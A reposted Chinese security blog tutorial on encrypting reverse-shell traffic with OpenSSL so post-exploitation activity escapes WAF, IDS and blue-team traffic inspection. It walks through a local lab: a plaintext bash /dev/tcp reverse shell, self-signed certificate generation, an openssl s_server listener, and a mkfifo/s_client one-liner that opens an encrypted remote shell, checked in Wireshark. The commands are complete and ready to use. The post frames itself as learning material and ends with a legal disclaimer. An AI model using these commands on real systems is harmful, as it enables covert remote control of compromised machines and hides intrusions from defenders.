在渗透测试的后渗透阶段为了更进一步横向扩大战果,往往需要反弹shell,而实际渗透的内网环境中大部分都会有一些安全产品(WAF/IPS/IDS/NDR/HIDS)等防护软件会进行流量检测,我们常规的反弹shell有一个个致命的弱点就是所有流量都是明文传输的,这样很容易被拦截和被蓝队发现进而流量回溯分析,那攻击就会被阻断,所以流量加密是一个攻击者必备的技能,我们可以看看一些apt相关的报告,很多apt组织都会去做一个流量加密。(未知攻焉知防)
测试环境
攻击机kali:192.168.0.110
目标机centos7:192.168.0.111
先走一遍常规的反弹shell
Kali上监听6666端口
受害机上先抓个包,然后执行命令反弹shell
tcpdump -i 网卡名称 -w 保存地址
bash -i>& /dev/tcp/192.168.0.110/6666 0>&1
然后去攻击机看看
成功弹过来了,我们断开tcpdump然后用wireshark看看。
追踪数据流发现,我们攻击的流量都是明文显示,如同裸奔。
下面我们使用openssl进行流量加密
在攻击机上使用OpenSSL生成自签名证书
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
在攻击机上监听端口
openssl s_server -quiet -key key.pem -cert cert.pem -port 10086
在目标机执行命令(记得提前tcpdump抓包)
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.0.110:10086 > /tmp/s; rm /tmp/s
然后我们看到弹过来了
执行几个命令,然后去目标机器关闭抓包,拿去wireshark看看。
可以看到,已经加密了。
MSF流量加密也可以使用openssl这个方法,各位可以参考其他大佬的文章,还有cs修改profile进行流量加密,原本想一并写在这篇文章里的,奈何你们过520给我整emo了没动力了,摆烂摆烂,下面放一下其他大佬的文章,你们可以看他们的参考再拓展。
https://mp.weixin.qq.com/s/jVjRKtR4KHHse3WbAQsKvQ
https://mp.weixin.qq.com/s/J5a3klXbAQpaiAYoxpQ19w
https://mp.weixin.qq.com/s/E0_7PXxH7GB7CIp4STEUTQ
https://mp.weixin.qq.com/s/Jw6nmpyWXZnAws2IIOgXdg
https://mp.weixin.qq.com/s/2ja07gCboEVU0D18BQIa0g
https://mp.weixin.qq.com/s/SvM2SyWowh3sHEhxXN5PWA
https://mp.weixin.qq.com/s/JRnJkqXktje49mO3LYaQKA
https://mp.weixin.qq.com/s/lKAHrkNCvZtVdCfRKbYB4g
https://mp.weixin.qq.com/s/ZD1XFINzo-JbrkbJCyHNXA
https://mp.weixin.qq.com/s/uQL_JhTvQUa4k7R9ZFVfww
(上面的链接都是一些大佬的公众号文章,我文章没排版看不习惯或者看我文章做出现bug了就去看他们的)
文章仅供学习参考,过程也是利用本地虚拟机演示,请勿利用文章内的相关技术从事非法测试,如因产生的一切不良后果与文章作者和本公众号无关。
原文始发于微信公众号(韭要学安全):利用OpenSSL对反弹shell进行流量加密
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论